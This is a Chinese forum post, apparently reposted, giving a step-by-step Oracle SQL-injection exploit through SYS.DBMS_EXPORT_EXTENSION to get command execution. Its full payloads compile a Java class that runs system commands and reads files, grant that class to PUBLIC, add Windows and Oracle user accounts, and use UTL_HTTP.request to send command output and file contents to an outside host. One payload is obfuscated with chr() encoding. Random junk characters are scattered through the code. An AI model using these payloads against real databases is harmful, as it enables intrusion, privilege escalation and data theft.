
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL*Plus 中执行的;在 web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

: j0 l3 y6 j- R, C( u) I  f1 R1 d  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 6 \* n; D, @( _! ?
的形式即可。(用 " 'a'|| " 是为了让语句返回 true 值)
语句有点长,可能需要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
- y9 f. h& y' N: a+ u& p( L9 d/xxx.jsp?id=1 and '1'<>'a'||( : ^( H  ]1 r% U5 V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& p% n: a# |! G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(# b9 J' t4 H7 `: @; f
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
; Y, B& P% x& P}'''';END;'';END;--','SYS',0,'1',0) from dual , y/ n" H, g4 G4 [$ R5 F
)
------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
. W, M% B0 H7 B* Q/ r/xxx.jsp?id=1 and '1'<>'a'||( . G1 Z. O# R" o' M
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 a$ P5 z6 ?0 ~' @; G" u4 q% Screate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& B3 b, t2 {9 x9 x2 [; b. x/ n
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}- L; Q0 w) q" ~; @
}'''';END;'';END;--','SYS',0,'1',0) from dual
- [' u8 X8 T- L)
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
------------------------------
2.赋 Java 权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
( }8 O& t5 P/ x: H$ Z; ^- h; Cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') i5 ?( T- l7 {) Q0 Y& W$ ?0 A$ h- p
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
1 j( T  [$ @8 ~! o+ C/ ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 i  T, H" q5 T4 t- ccreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual1 n$ R- t: _% ^# x
4.赋 public 执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
4 G- O+ K  ]: \0 l6 Y! Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>'11'||( - s0 `, R) L2 q9 `
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' / F5 F) s& V  p
) : W5 `1 x) l4 T- l
and '1'<>( * H; Y5 {. w3 T! I4 H# k
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
* q  n6 }  T) I$ G5 `)
6.执行命令:
2 h% e1 S9 k) n* ^" O3 V/xxx.jsp?id=1 and '1'<>( 8 z" g7 C' R& {6 ?
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual ' ^4 g) h$ X. S( j5 V2 S0 j: H7 o

: {5 N( _  _/ w: i)
! j  O! Q) k, k, Z1 m/xxx.jsp?id=1 and '1'<>( & W) b7 ~- {: T9 t* t, a1 ~9 o
select  sys.LinxReadFile('c:/boot.ini') from dual" |2 Y, q' q% u7 i/ w& |

' }0 E* }4 r/ m)0 X2 y2 R' r: `# E1 N
  % b5 e! |; ~' H  T# c: t
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
0 d+ c2 M: n  z4 `/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request():
' E* c2 r6 Z" j/xxx.jsp?id=1 and '1'<>( . h+ _. G0 X7 a& Y; L! E; g  r4 O
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual3 e; k# O4 v6 E4 H; r  R
) " f4 F5 ?1 X% F8 l
/xxx.jsp?id=1 and '1'<>( - S3 w6 d6 y: G. k
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual. K. g2 v: }4 e0 P2 K7 Q
) 6 w: G1 l! l" b& P' i
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变:
. {$ `* W( T+ B: I6 M; ^select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  v: `5 {' h; O) O9 Z* g
7.删除我们创建的函数
) a: ?  l* {2 ]+ p5 y1 fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ \2 u4 t" V. y( A! Fdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 1 f  z% V* m" X6 U
====================================================
全文结束。谨以此文赠与我的朋友。
linx
# [- j; b, r+ W! \9 I124829445 & f4 h0 t) {# q5 \. t/ S$ \2 h9 V  y
2008.1.12
linyujian@bjfu.edu.cn 5 p1 o  N  V/ W# {$ D, _. c
======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" l+ z* x2 {3 y4 |
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
# Z' @5 ?* N6 c1 kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
% C3 t3 j0 `" }chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 9 N% M6 w" q/ z# `* w
确定漏洞存在:
1<>(
/ d7 ?6 l) a# e  Dselect user_id from all_users where username='LINXSQL'
+ N$ i8 D" ^1 _5 W) ^7 K# D2 Y# a)
给 linxsql 连接权限:
/ R, i4 K& B  s4 p0 \) `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, z) x6 q  L* r# u8 c) FGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! L* q! `& a" W1 W: `drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1";但该函数声明为 authid current_user,权限是从调用者继承的,可能仅仅是 public 权限,作用似乎不大。真的要用的话可以考虑 grant dba to 当前的 User:
1.jsp?id=1 and '1'<>( ; Q, T& S8 G! u# [1 z: R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 e) X( Q) b. z0 ?
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual; p: l. _8 k& s9 a
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
" M7 M' @& `% E+ G% z" [ )
  _. }* W, @) l8 ~4 K4 A
6 ?6 H' \+ D' O$ }  p1 J3 u( f+ F6 A* M9 c) c( k0 d

& `5 z6 B- t, v4 n6 W# K; J1 n8 ^9 i